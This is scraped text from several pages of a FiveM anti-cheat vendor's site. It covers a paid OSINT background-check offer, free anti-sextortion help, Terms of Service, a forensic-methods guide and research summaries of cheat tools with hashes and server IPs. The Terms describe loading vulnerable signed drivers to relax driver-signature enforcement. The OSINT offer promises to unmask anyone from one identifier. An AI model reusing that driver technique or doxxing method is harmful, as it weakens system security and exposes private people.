can find, documented. $119per person * Deep cross-platform digging * Real identity, aliases & connected accounts * Photos, profiles, location & history * Breach / exposure findings * Confidence-rated dossier with evidence * Priority turnaround [Get started](https://clubhouseac.shop/osint#request) ### Retainer Ongoing checks for your community. Custommonthly * Recurring background checks * Bulk & rush requests * Dedicated analyst * Standing reporting cadence * Direct line to the team [Contact us](https://clubhouseac.shop/osint#request) Start a background check Give us a lead -------------- We need a starting point — a username, email, phone number, Discord ID, or profile link. Tell us what you want to know about the person and leave a way to reach you; we'll scope it and come back with a plan and a quote. * Any single identifier works as a lead * Public sources only * Documented dossier with sources * We contact you with a payment request before we start Just want a quick Discord check? [Try a free lookup →](https://clubhouseac.shop/check-user) The lead \* A starting point that identifies the person — the more specific, the better. What do you want to know about them? How should we reach you? \* **Payment first.** After you submit, we review the lead and contact you with a payment request — expect to hear from us before we start digging. Send request Private — reviewed only by our analysts. We work strictly from publicly available information. --- # Anti-Extortion Help · Clubhouse AC Clubhouse AC · Anti-Extortion Being extorted? Don't pay blind. ================================ Blackmail and sextortion — including the Roblox, Discord and “com” scene pressuring people (often minors) into sending images, then threatening to leak them. Paying almost never makes it stop. We find out who's really behind it, try our best to preserve the evidence, and where possible work with law enforcement and legal channels to get them arrested and held accountable. [Get help now](https://clubhouseac.shop/anti-extort#help) [Why it's free](https://clubhouseac.shop/anti-extort#free) Free — we don't charge victims Fast, priority response Legal & law-enforcement support Private & confidential Don't pay them, and don't go quiet. Paying an extorter almost always leads to more demands, not fewer. Keep every message, don't delete anything, and reach out — the sooner we start, the more we can recover and the stronger the case against them. Is it a minor being pressured for nudes? You're not in trouble — and not alone. Sextortion is one of the most common scams in the Roblox and Discord “com” scene: someone pressures you into sending an image, then threatens to leak it unless you send more or pay. If that's happening to you or someone you know — **stop contact, don't send anything, don't pay, and don't delete the messages** (they're evidence). Tell a trusted adult. For anyone under 18, please report it to the authorities too. In the US: the NCMEC [CyberTipline](https://report.cybertip.org/) and the FBI / local police, and NCMEC's free [Take It Down](https://takeitdown.ncmec.org/) service can help get images removed. Outside the US, contact your local police. We'll help identify the person and build the case alongside them. How we help Turn the tables on whoever's behind it -------------------------------------- ### Identify who's behind it We de-anonymize the extorter using OSINT — real identity, linked accounts, and where they operate from. ### Assess the threat We work out how real the leak or threat actually is, so you're not reacting blind to an empty bluff. ### Capture what we can We try our best to capture and document everything so it can hold up if it goes to a platform or the police. ### Pursue accountability Where possible we support law enforcement reports and legal action to get them arrested and held responsible. How it works From threat to accountability ----------------------------- 01 ### Reach out now Tell us what's happening and who's threatening you. Do not pay them anything first — talk to us. 02 ### We investigate We trace the person behind the threat, gauge how credible it is, and try our best to preserve the evidence. 03 ### We build the case A documented report you can take to a platform, a lawyer, or law enforcement — with everything sourced. 04 ### We help you shut it down Guidance on response, takedowns, reporting, and pursuing legal action against them. Free This help is completely free ---------------------------- We don't charge people who are being extorted. There's no payment, no catch, and we'll never ask you to pay us — or to pay the person threatening you. Just reach out and we'll help. ### No cost Zero charge to victims — ever. ### Fast response We treat these as urgent and reply quickly. ### Confidential Private, handled only by our team. [Get help now](https://clubhouseac.shop/anti-extort#help) Get help now Tell us what's happening ------------------------ Give us the situation and anything you have on who's threatening you. Attach evidence if you can — and leave a way to reach you. We'll respond fast. * Don't pay — talk to us first * We work to identify and expose them * Legal & law-enforcement support where possible * Completely free — we never charge victims What's happening? \* Who's threatening you? Anything that identifies them helps us trace who's really behind it. What are they demanding? If they're pressuring you for nudes or images, do not send anything — tell us instead. **This involves someone under 18.** Tick this so we prioritise it and handle it appropriately. For minors, please also report to your local authorities (in the US, the NCMEC CyberTipline) — we'll work alongside them. How should we reach you? \* Evidence / proof (optional)Attach screenshots, chat logs, or proofUp to 10 files, no size limit **Don't pay them.** We work to identify who's behind it, try our best to preserve evidence, and — where possible — support law enforcement and legal action to get them held accountable. **This is free.** We never charge victims, and we'll never ask you to pay us — or the person threatening you. After you submit, we'll reach out fast with next steps. Get help now Private and confidential — reviewed only by our team. If you're in immediate danger, contact your local emergency services first. --- # Terms of Service - Clubhouse AC · Clubhouse AC Legal Terms of Service ================ Last updated: July 5, 2026 1\. Acceptance of Terms ----------------------- By accessing or using Clubhouse AC ("the Service"), including the website, dashboard, scanner application, and related tools, you agree to be bound by these Terms of Service. If you do not agree to these terms, do not use the Service. 2\. Description of Service -------------------------- Clubhouse AC provides anti-cheat scanning and forensic analysis tools for FiveM server administrators. The Service includes a desktop scanner application, a web dashboard, PIN-based scan management, and related APIs. 3\. Acceptable Use Policy ------------------------- You agree to the following rules when using Clubhouse AC: * **No Self-Scanning.** You may not scan your own computer to test, preview, or circumvent detections. The scanner is intended solely for server administrators to verify the integrity of other players' systems. Self-scanning to learn what is detected and then evade those detections is strictly prohibited. * **No Scanning Friends or Associates.** You may not use the scanner on friends, associates, or anyone you have a personal relationship with for the purpose of helping them identify and evade detections. Scanning your friend will result in an immediate ban. * **No Reverse Engineering.** You may not decompile, disassemble, reverse engineer, or otherwise attempt to derive the source code, algorithms, or detection signatures of the scanner application or any component of the Service. * **No Tampering.** You may not modify, patch, hook, inject into, or otherwise tamper with the scanner application or its communications with the server. * **No Sharing or Redistribution.** You may not share, redistribute, resell, or make the scanner application available to unauthorized parties. Your subscription and PINs are for your server's use only. * **No Evasion Assistance.** You may not use information obtained from the Service to help others avoid or circumvent anti-cheat detections. * **No Abuse of PINs.** PINs must only be issued to players who are being scanned as part of a legitimate server verification process. PINs may not be used for harassment, coercion, or any purpose other than their intended use. * **No Automated Access.** You may not use bots, scripts, or automated tools to interact with the Service except through officially provided APIs. 4\. Subscriptions and Payments ------------------------------ Access to the Service requires an active subscription. Subscriptions are billed according to the plan selected at checkout. Slot availability is limited and subject to change. Refunds are handled on a case-by-case basis at our discretion. By purchasing, you agree that delivery of your product may take up to one week due to order volume and fulfillment queue times. 5\. Data Collection and Privacy ------------------------------- The scanner performs a one-time forensic snapshot of the machine on which it is run. Each scan begins only after a player voluntarily redeems a PIN that the server administrator has issued to them, which constitutes the player's informed consent to the collection described below. **System forensic data.** The scanner collects information that anti-cheat investigators rely on to identify the presence of cheat software, including: operating system details, hardware identifiers (used for ban enforcement and scan attribution), running processes, loaded modules, installed programs, recently executed binaries, file system metadata, registry artifacts, event log excerpts, network adapter information, and similar forensic signals. **Visual forensic evidence.** The scanner captures screenshots of the player's display(s) at the moment of the scan. These images are used by server administrators as part of their review to corroborate findings (for example, to verify that a flagged process matches an on-screen overlay) and serve as an audit trail of the scan environment. Screenshots are stored alongside the scan report under the same access controls as the rest of the report. **Transport and storage.** All collected data is transmitted to Clubhouse AC over an encrypted, session-bound channel and is stored in our infrastructure. Access to a given scan report is restricted to the administrator who issued the PIN, that administrator's authorized staff, and Clubhouse AC personnel responsible for operating the platform. Reports are not made public. **Notice to scanned users.** Server administrators are responsible for informing players, in advance of issuing a PIN, that running the scanner will collect the categories of data described in this section, including screenshots. Players who do not wish to be scanned should decline the PIN. Redeeming a PIN and completing a scan constitutes acceptance of this collection. 6\. Scanner Technology and Kernel Access ---------------------------------------- Detecting modern game cheats reliably requires inspection at a level that user-mode software cannot reach. Cheats routinely install user-mode hooks, hide modules from standard enumeration APIs, and operate from kernel space themselves. To produce accurate forensic reports under those conditions, the Clubhouse AC scanner loads signed Windows kernel drivers during each scan and uses them to perform read-only low-level system inspection. **Drivers used.** The scanner loads one of two third-party vendor-signed kernel drivers as a transport for physical-memory inspection. The primary driver is `iqvw64e.sys`, the Intel Network Adapter Diagnostic Driver, originally published and digitally signed by Intel Corporation and accepted by Microsoft's Driver Signature Enforcement. If `iqvw64e.sys` cannot be loaded on the player's system, the scanner falls back to `gdrv.sys`, a kernel driver originally published and digitally signed by GIGA-BYTE Technology and distributed with GIGABYTE motherboard utilities. Clubhouse AC does not author or modify either driver; both are loaded as-is from vendor-signed binaries. **Custom inspection driver.** Once one of the two third-party drivers is loaded, the scanner uses it to briefly relax kernel driver-signing enforcement, load a small read-only inspection driver authored by Clubhouse AC (`ClubhouseACKernel.sys`), and then immediately restores driver-signing enforcement. The inspection driver registers no kernel callbacks, does not modify other drivers, does not write to kernel memory, and is unloaded when the scan completes. **Scope of use.** Both the vendor-signed transport driver and the Clubhouse AC inspection driver are loaded only for the duration of an active scan and are unloaded when the scan completes or the scanner exits. Their use is strictly read-only: the scanner reads memory pages and enumerates kernel objects in order to identify cheat artifacts. Clubhouse AC does not patch system components, disable other security software, install persistent services, or modify the protected operating system state of the scanned machine outside of the brief driver-signing relaxation described above, which is reverted before the scan begins reading. **Known characteristics.** Like many third-party drivers shipped with consumer hardware utilities, both `iqvw64e.sys` and `gdrv.sys` expose interfaces that, if abused by a separate piece of software with administrator privileges, could be used for low-level memory access. They appear on the Microsoft Vulnerable Driver Blocklist on systems where it is enforced; on those systems the scanner will report that it could not load a kernel transport, and the scan will run with reduced coverage. Clubhouse AC uses these interfaces solely for the forensic purposes described above and unloads both drivers promptly after each scan to minimize their presence on the system. Players who already run security tooling that flags or removes vendor-signed drivers of this class should be aware that the scanner may be incompatible with such tooling. **Alternatives and consent.** Players who do not wish to permit kernel-level inspection of their system should not redeem a Clubhouse AC PIN. Completing a scan constitutes acknowledgement that the scanner has used the technology described in this section in the course of producing the scan report. 7\. Account Termination ----------------------- We reserve the right to suspend or terminate your account and access to the Service at any time, with or without notice, for any reason, including but not limited to violation of these Terms. Upon termination, your right to use the Service ceases immediately. No refunds will be issued for terminations due to Terms violations. 8\. Enforcement --------------- Violations of these Terms, particularly the Acceptable Use Policy, may result in immediate account suspension, permanent ban, and forfeiture of any remaining subscription time. We employ technical measures to detect violations including but not limited to self-scanning detection, anomaly analysis, and behavioral monitoring. 9\. Disclaimer of Warranties ---------------------------- The Service is provided "as is" and "as available" without warranties of any kind, either express or implied. We do not guarantee that the Service will be uninterrupted, error-free, or that detections will be 100% accurate. False positives and false negatives may occur. 10\. Limitation of Liability ---------------------------- To the maximum extent permitted by law, Clubhouse AC and its operators shall not be liable for any indirect, incidental, special, consequential, or punitive damages arising from your use of the Service. 11\. Changes to Terms --------------------- We may update these Terms at any time. Continued use of the Service after changes constitutes acceptance of the revised Terms. Material changes will be communicated via the dashboard or email where possible. 12\. Contact ------------ For questions about these Terms, contact us through our Discord server or via the dashboard. 13\. Technology Disclosure -------------------------- Portions of this platform were developed with AI-assisted tooling. All code, detections, and security measures are architected, reviewed, and maintained by the Clubhouse AC team. --- # Clubhouse AC — Forensic PC Scanning for Game Servers [](https://clubhouseac.shop/) [Clubhouse AC](https://clubhouseac.shop/) [Features](https://clubhouseac.shop/#features) [Pricing](https://clubhouseac.shop/#pricing) [Check User](https://clubhouseac.shop/check-user) [Status](https://clubhouseac.shop/status) [Dashboard](https://clubhouseac.shop/dashboard) Live System status ============= Real-time health monitoring for all Clubhouse AC services. Uptime — Last 30 days Avg Response — Across all services Services — Healthy Total Detections — All time Service Components ------------------ Loading... Loading service status... Operational Degraded Outage Auto-refreshes every 15 seconds. Response times measured in real-time. --- # Tier 2 — Advanced PC Checking Methods · Clubhouse AC Tier 2Deep dive · 30–60 min · 40 methods Advanced PC Checking ==================== Beyond surface artifacts. Tier 2 introduces NTFS-level reconstruction of file lifecycles, multi-source execution correlation, automated event-log threat hunting, and unified timeline analysis in Timeline Explorer. Each technique strengthens the case by stacking independent evidence sources. All40Tier 2 Tool Downloads3Deep File System Analysis8Deep Execution Correlation4Timeline & Event Analysis3User Activity Deep Dive6Process & Memory4Persistence & Evasion5External Devices2Java & Scripts2Hash & Binary Triage2Full Timeline Reconstruction1 T2 Tier 2 Tool Downloads --------------------- 3 ### Eric Zimmerman Tools (T2 Focus) Eric Zimmerman's free forensic toolkit covers NTFS artifacts, registry analysis, execution history, browser databases, and timeline correlation. Tier 2 relies heavily on MFTECmd, Timeline Explorer, AmcacheParser, SrumECmd, and several others to reconstruct the full story of what ran on a system and when. 2 tools ### Hayabusa (Yamato Security) Sigma-based threat hunting + fast forensics timeline generator for Windows event logs. Written in Rust. Cross-platform. 4 tools ### INDXRipper Carves file metadata from NTFS $I30 index attributes — finds deleted files that other tools miss. 2 tools T2 Deep File System Analysis ------------------------- 8 ### $MFT Analysis The Master File Table ($MFT) is the backbone of NTFS. Every file and folder ever created has an MFT record — including deleted ones whose records haven't been overwritten. Tier 2 analysis goes beyond basic parsing to correlate timestamps, detect timestomping, and reconstruct deleted file activity. 1 tool1 location1 command ### $UsnJrnl:$J Deep Parsing The USN Journal ($J) is a change log for every file operation on an NTFS volume. Tier 2 goes beyond 'what was deleted' to reconstruct full file lifecycles — create, rename, modify, delete — with exact timestamps. 1 tool1 location1 command ### $LogFile Analysis The NTFS $LogFile is a transaction journal that records metadata changes to the file system. It's used by Windows for crash recovery but contains forensically valuable data about file operations — even operations that are no longer reflected in the $MFT or USN Journal. 2 tools1 location1 command ### $INDX / $i30 Folder Residue Checks Every NTFS directory has an $INDEX\_ALLOCATION attribute (commonly called $I30) that stores metadata about the files inside it. When a file is deleted, its $I30 index entry often remains in the slack space — this can prove a file existed even after the MFT record is gone. One of the most powerful Tier 2 artifacts because it survives longer than almost everything else. 2 tools1 command ### Timestamp Stomping Detection ($SI vs $FN) Every NTFS file has TWO sets of timestamps: $STANDARD\_INFORMATION ($SI), easily modified by user-level tools, and $FILE\_NAME ($FN), only modified by the kernel. Comparing $SI vs $FN reveals timestomp manipulation. 1 tool1 command ### Deleted File Recovery Checks When files are deleted, the data usually stays on disk until overwritten. MFT entries are marked as free but may still contain metadata. Specialized tools can recover deleted files or at least prove they existed. 4 tools ### ADS & MOTW (Zone.Identifier) Checks Mark of the Web (MOTW) is a Zone.Identifier ADS that Windows adds to any file downloaded from the internet. It records the source URL and Zone (3 = Internet). This proves a file was downloaded even if the user claims it wasn't. ADS can also hide cheat payloads inside innocent files. 2 tools1 command ### File Replacement Detection A common bypass is replacing a legitimate system file or game file with a modified one (e.g., swapping a legit DLL for a cheat DLL). Detecting this requires comparing file hashes, signatures, and metadata against known-good versions. 2 tools1 command T2 Deep Execution Correlation -------------------------- 4 ### AmCache Deep Execution Correlation Beyond basic parsing, Tier 2 AmCache analysis focuses on deeper correlation patterns — unassociated entries, hash extraction, cross-reference with ShimCache and UserAssist, and detecting selective wipes via transaction logs. 1 tool1 command ### UserAssist + ShimCache + AmCache Correlation The triple-source execution correlation. Each artifact records execution differently: UserAssist (GUI launches via Explorer, ROT13 encoded, NTUSER.DAT), ShimCache (programs Windows has seen with execution flag, SYSTEM hive), AmCache (executed programs with SHA-1 hash, Amcache.hve). 3 tools ### RecentFileCache Analysis RecentFileCache.bcf (Windows 7/8) and its successor data in Amcache track recently referenced executables. This artifact records files the system encountered, even if they weren't directly executed. 1 tool2 locations ### SRUM / SRUDB.dat Analysis System Resource Usage Monitor (SRUM) tracks application resource usage over 30-60 days. It records which applications ran, how much CPU/memory/network they used, timestamps, and user SID — even after the program is deleted. 1 tool1 location1 command T2 Timeline & Event Analysis ------------------------- 3 ### Hayabusa Event Timeline Review Hayabusa is a Sigma-based threat hunting and fast forensics timeline generator for Windows event logs. Written in Rust, it processes 200K+ event log entries and reduces them to only the suspicious/relevant hits using 4000+ detection rules. Way faster and more effective than manual event log review. 3 tools1 command ### Timeline Explorer Correlation Timeline Explorer is the central hub for all Tier 2 analysis. It's where you load CSV outputs from every tool and build a unified, correlated timeline of everything that happened on a system. 1 tool ### Deep Event ID Review Windows event logs record thousands of events, but only a fraction are forensically significant. Tier 2 shifts from manual browsing to targeted lookup of specific Event IDs that reveal service manipulation, PowerShell abuse, driver loads, and anti-forensic activity. These IDs are used in conjunction with Hayabusa and EvtxECmd to build a correlated timeline. 2 tools T2 User Activity Deep Dive ----------------------- 6 ### ActivitiesCache.db Analysis Windows 10/11 Timeline stores user activity in an SQLite database called ActivitiesCache.db. It records application usage, files opened, websites visited, and critically — the DURATION of each activity. Stores up to 30 days. Enabled by default. 1 tool1 location1 command ### ShellBags with Timestamp Correlation ShellBags are registry keys that record Explorer folder view settings — but more importantly, they prove a folder was OPENED. Even if the folder is deleted, the ShellBag persists. Timestamps show when the folder was first and last accessed. 2 tools3 locations ### JumpList & LNK Metadata Comparison LNK files contain rich metadata: target path, file size, volume serial number, MAC address, NetBIOS name, and timestamps. Jump Lists track per-application file access history. Tier 2 compares this metadata for inconsistencies. 2 tools ### Browser Download → Execution Timeline Build a complete chain from download to execution to deletion: Download (browser) → Extract (USN Journal) → Execute (Prefetch, AmCache, BAM) → Delete (USN, $I30) → Cleanup (cleared logs). 2 tools ### Registry OpenSavePidlMRU OpenSavePidlMRU is a registry key that tracks files opened or saved through Windows common file dialogs (Open/Save As), recording the full file path and extension each time. During a PC check this artifact proves a user directly interacted with a specific file — even if that file has since been deleted — because the MRU entries persist in the registry. It is particularly valuable for finding .exe, .dll, .zip, or .rar files a user opened from suspicious paths like AppData or Temp. 1 tool1 location ### Windows.db Search Index Windows Search indexes files on disk into Windows.db / Windows.edb. This database can contain references to files that have since been deleted — including their names, paths, and properties. 2 tools2 locations T2 Process & Memory ---------------- 4 ### Process Hollowing & Reflective DLL Injection Process Hollowing: a legitimate process is spawned in a suspended state, its memory is replaced with malicious code, and then resumed — looks normal from the outside. Reflective DLL Injection: a DLL is loaded directly into memory without ever touching disk, bypassing standard DLL loading APIs. 2 tools ### Suspicious Loaded Module Review Tier 2 module review goes beyond presence checks: signature validation, path sanity, load-order hijack detection, and side-loading checks against known game DLL baselines. 3 tools1 command ### PowerShell Memory String Analysis Even if PowerShell history is deleted, strings from executed commands may remain in process memory. Dumping process memory and extracting strings can reveal commands, URLs, and file paths. 2 tools1 command ### Kernel Live Dump Analysis Windows can generate Kernel Live Dumps — snapshots of kernel memory without crashing the system. These dumps can reveal loaded kernel drivers, including unsigned or malicious ones used by kernel-level cheats. 2 tools1 location1 command T2 Persistence & Evasion --------------------- 5 ### Regsvr32 / Rundll32 Abuse regsvr32.exe and rundll32.exe are legitimate Windows tools that can be abused to execute malicious DLLs. They're commonly used by cheats to load DLLs without directly running an .exe. 3 tools ### COM Hijack Artifacts COM (Component Object Model) hijacking replaces legitimate COM object references in the registry with paths to malicious DLLs. When a program loads the COM object, it loads the malicious DLL instead. 2 tools2 locations ### WMI Persistence WMI (Windows Management Instrumentation) can be used to create persistent event subscriptions that execute code on specific triggers (boot, logon, timer). These are invisible in Task Scheduler and most startup monitors. 1 tool1 command ### Task Scheduler XML & StartupInfo XML Scheduled tasks are stored as XML files. Tier 2 examines the raw XML for hidden details — including tasks that have been deleted but leave XML remnants, or tasks with obfuscated actions. StartupInfo XML logs every program that ran at startup with timestamps and duration. 1 tool3 locations ### Service Deep Dive (Thread Suspension, Restart, Termination) Beyond checking if services are running, Tier 2 examines manipulation patterns. Thread Suspension: a service's threads can be suspended without stopping the service — it shows as 'Running' but isn't actually doing anything. Restart Time Comparison: forensic services restarted right before a check have suspicious recent start times. Event ID 7031: forceful termination by bypass tools. 2 tools1 command T2 External Devices ---------------- 2 ### FAT32 / exFAT USB & External Drive Investigation USB drives formatted as FAT32/exFAT don't have NTFS artifacts ($MFT, USN Journal, ADS). This makes them harder to investigate — but host artifacts (USBSTOR, ShellBags, LNK files) still record what happened. 4 tools ### Volume Shadow Copy Comparison Mount previous shadow copies and compare against the current live system. Differences reveal what was deleted, modified, or cleaned between snapshots. 1 tool1 command T2 Java & Scripts -------------- 2 ### Java Execution & Loader Traces Java-based cheat loaders are common in games like Minecraft and older browser-era titles. They operate through the JVM runtime (java.exe or javaw.exe) rather than as standalone executables, which can bypass some simple process-name checks. Tier 2 analysis traces their activity through Prefetch entries for the JVM, temp folder artifacts left during class loading, the Java deployment cache, and USN Journal entries recording .jar and .class file creation and deletion. 1 command ### Script Execution Artifact Correlation Track script execution across multiple artifact sources: PowerShell Event ID 4104 (script block logging), PowerShell Event ID 600 (engine host), WSCRIPT.EXE/CSCRIPT.EXE in Prefetch, MSHTA.EXE in Prefetch, ConsoleHost\_history.txt, and encoded command detection. 3 tools T2 Hash & Binary Triage -------------------- 2 ### VirusTotal Hash Correlation VirusTotal scans files against 70+ antivirus engines. You don't need the file itself — just the hash (SHA-1, SHA-256, or MD5) to check if it's been flagged. 2 tools1 command ### Suspicious Unsigned Binary Triage Five-step workflow: find unsigned binaries, extract strings, check file properties (no version info, packing, size anomalies), submit to VirusTotal, cross-reference with execution artifacts. 3 tools T2 Full Timeline Reconstruction ---------------------------- 1 ### Full Timeline Reconstruction Across Artifacts The ultimate Tier 2 technique. Build a single timeline from ALL artifact sources and correlate everything. Three steps: collect, load+merge, correlate. 1 tool The Golden Rule — Tier 2 The timeline doesn't lie. Every action leaves traces in multiple places. Cross-reference EVERYTHING. If it happened, the evidence is there — you just have to find it. [Previous\ \ Tier 1 · Foundation](https://clubhouseac.shop/research/pc-checking-methods/tier-1) [Next\ \ Tier 3 · Elite forensic](https://clubhouseac.shop/research/pc-checking-methods/tier-3) --- # Clubhouse AC — Security Research Clubhouse AC — Security Research https://clubhouseac.shop/research Forensic case studies from the Clubhouse AC research team. Kernel-mode artifact analysis, anti-forensic detection, BYOVD chain reconstruction, DMA hardware fingerprinting, and Windows DFIR techniques. en-us Thu, 25 Jun 2026 00:00:00 GMT ClubXJefe Disclosure Response — Claim-by-Claim Rebuttal and Counter-Disclosure https://clubhouseac.shop/research/clubxjefe https://clubhouseac.shop/research/clubxjefe Thu, 25 Jun 2026 00:00:00 GMT A competing FiveM cheat vendor published a long-form accusation alleging the Clubhouse scanner is an infostealer. We answer every claim against the actual scanner source — including Wi-Fi password access, browser token exfiltration, wallet harvesting, and kernel hooking claims — and then publish a capability-level counter-disclosure of the accuser's own BYOVD loader and the affiliated reseller binary, both of which add persistence, kernel tampering, Discord OAuth identity capture, and wholesale browser-token exfiltration that the scanner does not perform. Clubhouse AC Research Disclosure Response Disclosure Counter-Disclosure BYOVD Infostealer FiveM Privacy Phase.uno Cheat Suite — Full Reverse Engineering of 8 PE Modules https://clubhouseac.shop/research/phase-uno-cheat-suite https://clubhouseac.shop/research/phase-uno-cheat-suite Fri, 19 Jun 2026 00:00:00 GMT Complete reverse engineering of the Phase.uno multi-game cheat suite: 8 PE modules targeting 9 games. Fileless no-EXE launch via Spotify.exe process hosting, services.msc SCM injection chain into svchost:Dnscache, WFP domain blocking, system process injection, streamproof overlays, NtQuerySystemInformation hooking, manual mapping, thread context hijacking, and AES-GCM encrypted C2. Includes 8 YARA rules (including post-destruct detection) and comprehensive IOCs. Clubhouse AC Research Cheat Detection Phase.uno WFP Manual Mapping Process Injection Streamproof FiveM Multi-Game YARA Notepad Bypass: fa817dc1 Full Reversal — ROL-XOR Cipher, CPU Affinity & WTS Cross-Session Messaging https://clubhouseac.shop/research/notepad-bypass-detection https://clubhouseac.shop/research/notepad-bypass-detection Sat, 06 Jun 2026 00:00:00 GMT Deep static analysis of a FiveM bypass masquerading as notepad.exe (SHA-256: b61907b9…f8d39a18, 4.90 MB, timestamped 2023-09-27). Six hollowed virtual PE sections, single .tiko payload at 7.88 entropy, ROL-XOR decryption key 0x32063cae shared with ApateonDecoy/Wizard — same packer family. Export table abuse: 3,100-byte encrypted blob with 7.94 entropy as the sole export 'name'. NtQuerySystemInformation direct ntdll anti-debug, window station check, CPU affinity mask fingerprinting (3 affinity APIs), WTSSendMessageW cross-session messaging, and timing evasion. Full 16-function stub map, YARA rules for exact and family-level detection, screenshare methodology. Clubhouse AC Research Bypass Detection FiveM Bypass Detection YARA Custom Packer ROL-XOR Cipher Anti-Debug Spotless Bypass: Full Paid Kernel Reversal, C2 Infrastructure & TZX Connection https://clubhouseac.shop/research/spotless-bypass-detection https://clubhouseac.shop/research/spotless-bypass-detection Fri, 05 Jun 2026 00:00:00 GMT Paid engagement: we reversed the Spotless FiveM bypass suite in full using Ghidra on Kali Linux after pulling all 16 files from an unprotected file server (93.127.141.9:8080) — IP found hardcoded in a client-provided DLL. Covers neguin.sys kernel driver (VolCache device, ETW hooks, ObCallbacks, manual DLL map via IOCTL 0x222004), MB.dll C2 auth, Discord token theft, process hollowing into dllhost.exe, AES-CBC decryption key recovered from crypt.exe global initializer, bufa.dll BYOVD loader, v3.dll cheat engine (compiled May 29 2026), fulano.dll targeting 16 FiveM build processes, bananacomleite.exe with RSA TLS pinning, and confirmed TZX infrastructure crossover via api.tzproject.com. Clubhouse AC Research Bypass Detection FiveM Kernel Driver Paid Engagement TZX Connection Ghidra Club44 Decompiled: BSOD-Triggering System32 Deletion & Brazilian Dev Errors https://clubhouseac.shop/research/club44-decompiled-detection https://clubhouseac.shop/research/club44-decompiled-detection Tue, 02 Jun 2026 00:00:00 GMT Full decompilation analysis of Club44, revealing catastrophically unsafe code that deletes System32 on error — triggering a BSOD. The binary strings include the infamous 'Falha NtCreateThreadEx' error message in Portuguese (the developer's native language), exposes a 'Club44-FiveM-External/1.0' User-Agent string hardcoded in HTTP requests, and injects into SystemSettingsBroker.exe. A monument to dangerous incompetence. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Decompiled BSOD Risk SystemSettingsBroker Sacred Bypass PWNED: Screenshot Storage Exposed & It's Just Windhawk https://clubhouseac.shop/research/sacred-bypass-detection https://clubhouseac.shop/research/sacred-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT PWNED: Sacred Bypass exposed an unauthenticated screenshot storage server at 46.202.140.112, leaking approximately 2,500 customer screenshots including personal desktop content, file listings, and sensitive information. Independent analysis reveals the 'bypass' is functionally Windhawk + Spotify running as Administrator — not a proprietary kernel solution. Full exposure and technical analysis. Clubhouse AC Research Bypass Detection FiveM Bypass Detection PWNED Data Exposure Windhawk Vanish Bypass: Spotify.exe Masquerade with Journal Trace Evidence https://clubhouseac.shop/research/vanish-bypass-detection https://clubhouseac.shop/research/vanish-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Vanish Bypass, distributed as Spotify.exe to blend into a player's music application. SHA-256: 039cb40286288bc9b661ad19efa2f45ca2c9818a02c14a44c59df44b9b5f7bfe. Despite the masquerade, Journal Trace records preserve the true file path and creation event. Covers the Spotify masquerade technique, Journal Trace recovery, and hash-based definitively identification against legitimate Spotify binaries. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Spotify Masquerade Journal Trace IOC Apateon Bypass: kokaizanh.exe with March 2026 DPS Timestamp https://clubhouseac.shop/research/apateon-bypass-detection https://clubhouseac.shop/research/apateon-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Apateon Bypass (kokaizanh.exe). SHA-256: f9ad0e39cebb900f9864a1bfc4101f5d8562d9ba92e4f5bbb8b8d62daae74713. DPS: 2026/03/18. PcaSVC: 0x287a000. The randomised executable name is a superficial obfuscation — DPS and PcaSvc execution timestamps provide definitive confirmation regardless of filename changes or post-execution cleanup attempts. Clubhouse AC Research Bypass Detection FiveM Bypass Detection DPS Timestamp PcaSVC IOC Titan Bypass: Thoroughly Underwhelming Anti-Forensics That Leave Everything https://clubhouseac.shop/research/titan-bypass-detection https://clubhouseac.shop/research/titan-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Titan Bypass — a bypass product that, despite marketing itself on anti-forensic capability, leaves artifacts in Event Viewer, Journal Trace, LastActivityView, and plaintext Notepad files sitting on the desktop. A masterclass in false confidence. Detection requires nothing exotic: standard five-minute screenshare procedure surfaces the full execution timeline without specialist tooling. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Event Viewer Journal Trace IOC Genesis Bypass: pwahelper.exe with Genesis-Rework Hook PDB https://clubhouseac.shop/research/genesis-bypass-detection https://clubhouseac.shop/research/genesis-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Genesis Bypass (pwahelper.exe). SHA-256: 93780adffbda11803c3a6f40730403d09495dd85877700503894f48c1e36a958. DPS: 2026/03/21. PcaSVC: 0x79000. Retains the PDB path 'Genesis-Rework hook.pdb' in its debug directory — the developer forgot to strip debug symbols, providing a high-confidence YARA detection string. Covers PDB artifact analysis, DPS/PcaSvc corroboration, and YARA rule construction. Clubhouse AC Research Bypass Detection FiveM Bypass Detection PDB Artifact YARA pwahelper.exe Stainless Bypass: telephon.cpl with RTCore64 BYOVD Driver https://clubhouseac.shop/research/stainless-bypass-detection https://clubhouseac.shop/research/stainless-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Stainless Bypass (telephon.cpl). SHA-256: 9104158b8ee2f545697504a368be7fd264cadac2ed38ecd80a8dcc9f42e27097. Loads the RTCore64.sys vulnerable driver (a known BYOVD target) to disable kernel callbacks. YARA rule matches on both stainless.pdb PDB path and RTCore64 driver filesystem paths embedded in the binary. Covers BYOVD chain reconstruction and YARA detection methodology. Clubhouse AC Research Bypass Detection FiveM Bypass Detection BYOVD RTCore64 YARA XYZ Corp Bypass: Randomised Executable Name with xyzcorporation.xyz C2 https://clubhouseac.shop/research/xyz-corp-bypass-detection https://clubhouseac.shop/research/xyz-corp-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of XYZ Corp Bypass (ear6tkyel9rv.exe — randomly generated filename). SHA-256: 6cb47876cd00d14ba9c5a85f9b2ccbc91e34c13190feb1c099310f6969bd35c0. DPS: 2026/03/06. Extracted from C:\\Users\\Administrator\\AppData\\Local. C2 domain: xyzcorporation.xyz. The randomised executable name is a weak obfuscation — DPS timestamps and the C2 domain provide reliable cross-source confirmation. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Random Filename C2 Domain IOC Sulution Software Bypass: Three Build Variants with March 2026 DPS Timestamps https://clubhouseac.shop/research/sulution-software-detection https://clubhouseac.shop/research/sulution-software-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Sulution Software Bypass, which shipped at least three distinct builds in rapid succession (DPS: 2026/03/18 and 2026/03/20). SHA-256 hashes: 